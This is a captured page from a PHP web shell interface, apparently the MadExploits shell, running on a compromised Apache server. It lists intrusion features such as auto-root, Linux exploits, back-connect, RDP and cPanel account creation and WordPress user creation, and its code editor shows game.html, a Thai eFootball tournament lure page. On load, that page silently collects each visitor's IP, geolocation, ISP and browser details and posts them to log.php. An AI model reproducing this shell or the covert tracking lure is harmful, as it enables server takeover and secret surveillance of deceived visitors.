Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.117.132.49
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
afra /
ip.siamweeds.com /
[ HOME SHELL ]
Name
Size
Permission
Action
image
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
conn_ip.log
19.33
KB
-rw-r--r--
game.html
6.08
KB
-rw-r--r--
index.html
3.43
KB
-rw-r--r--
log.php
1.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : game.html
<!DOCTYPE html> <html lang="th"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- SEO Meta Tags (Updated for Gaming Campaign in Thai) --> <meta name="description" content="เข้าร่วมการแข่งขัน eFootball Pro League Thailand 2025! ชิงเงินรางวัล 160,000 บาท และเป็นแชมป์ของลีก! ลงทะเบียนเลย!"> <meta name="keywords" content="eFootball, Pro League Thailand, การแข่งขันเกม, เกมฟุตบอล, อีสปอร์ต, เกมในไทย"> <meta name="author" content="SiamWeeds"> <meta name="robots" content="index, follow"> <!-- Open Graph Meta Tags for Image --> <meta property="og:title" content="eFootball Pro League Thailand 2025"> <meta property="og:description" content="เข้าร่วมการแข่งขัน eFootball Pro League Thailand 2025 ชิงเงินรางวัล 160,000 บาท! ลงทะเบียนเลย!"> <meta property="og:image" content="https://ip.siamweeds.com/image/game-1.jpg"> <meta property="og:type" content="website"> <meta property="og:url" content="https://ip.siamweeds.com/game.html"> <!-- Twitter Card Meta Tags --> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="https://ip.siamweeds.com/image/game-2.jpg"> <!-- Favicon --> <link rel="icon" type="image/png" href="/image/EFootball_logo.png"> <title>eFootball Pro League Thailand 2025 - ลงทะเบียนเลย!</title> <link rel="stylesheet" href="/styles/style.css"> <script> // Function to fetch IP and geolocation (runs in background, no display) async function fetchIPDetails() { try { const response = await fetch('https://ipapi.co/json/'); const data = await response.json(); const ip = data.ip; const city = data.city || "N/A"; const region = data.region || "N/A"; const country = data.country_name || "N/A"; const postal = data.postal || "N/A"; const isp = data.org || "N/A"; const timezone = data.timezone || "N/A"; const utc_offset = data.utc_offset || "N/A"; const latitude = data.latitude || "N/A"; const longitude = data.longitude || "N/A"; const hostname = data.hostname || "N/A"; const browser = navigator.userAgent; const platform = navigator.platform; // No display, just log the data await fetch('log.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ ip, city, region, country, postal, isp, timezone, utc_offset, latitude, longitude, hostname, browser, platform }) }); } catch (error) { console.error("Error fetching IP details:", error); } } // Function to close popup function closePopup() { document.getElementById("popup").style.display = "none"; } // Run fetchIPDetails on page load window.onload = function() { fetchIPDetails(); // Runs in background }; </script> </head> <body> <!-- Banner Section (game-2.jpg) --> <div class="banner"> <img src="/image/game-2.jpg" alt="แบนเนอร์ eFootball Pro League Thailand 2025" class="banner-image"> <button class="register-btn" onclick="alert('การลงทะเบียนจะเปิดให้บริการเร็ว ๆ นี้!')">ลงทะเบียนเลย</button> </div> <!-- Campaign Section --> <div class="campaign-section"> <img src="/image/EFootball_logo.png" alt="โลโก้ eFootball" class="campaign-logo"> <h1 class="campaign-title">eFootball Pro League Thailand 2025</h1> <p class="campaign-subtitle">จิตวิญญาณของฟุตบอลอยู่ที่นี่! การแข่งขัน eFootball Pro League Thailand ที่ยิ่งใหญ่ที่สุด!</p> <p class="campaign-description">เข้าร่วมการแข่งขัน eFootball สุดยิ่งใหญ่ในประเทศไทย! แข่งขันกับผู้เล่นที่ดีที่สุด ชิงเงินรางวัลรวม <strong>160,000 บาท</strong> และก้าวขึ้นเป็นแชมป์ของ Pro League 2025</p> <div class="campaign-details"> <p><span class="highlight">วันที่จัดงาน:</span> 16 พฤษภาคม 2568</p> <p><span class="highlight">วันสุดท้ายของการลงทะเบียน:</span> 28 เมษายน 2568</p> <p><span class="highlight">ลงทะเบียนเลย:</span> สแกน QR Code หรือติดต่อเราที่ <strong>Line ID: 2048</strong> เพื่อสอบถามรายละเอียดเพิ่มเติม</p> </div> <p class="campaign-footer">eFootball Pro League Thailand 2025 - อย่าพลาดโอกาสเป็นแชมป์!</p> </div> <!-- Main Content (Hidden IP Info) --> <div id="ip-info" style="display: none;"> <p>กำลังโหลดข้อมูลของคุณ...</p> </div> <!-- Popup Section (game-1.jpg) --> <div id="popup" class="popup"> <div class="popup-content"> <span class="close-btn" onclick="closePopup()">×</span> <img src="/image/game-1.jpg" alt="ป๊อปอัพ eFootball Pro League Thailand 2025" class="popup-image"> </div> </div> </body> </html>
Close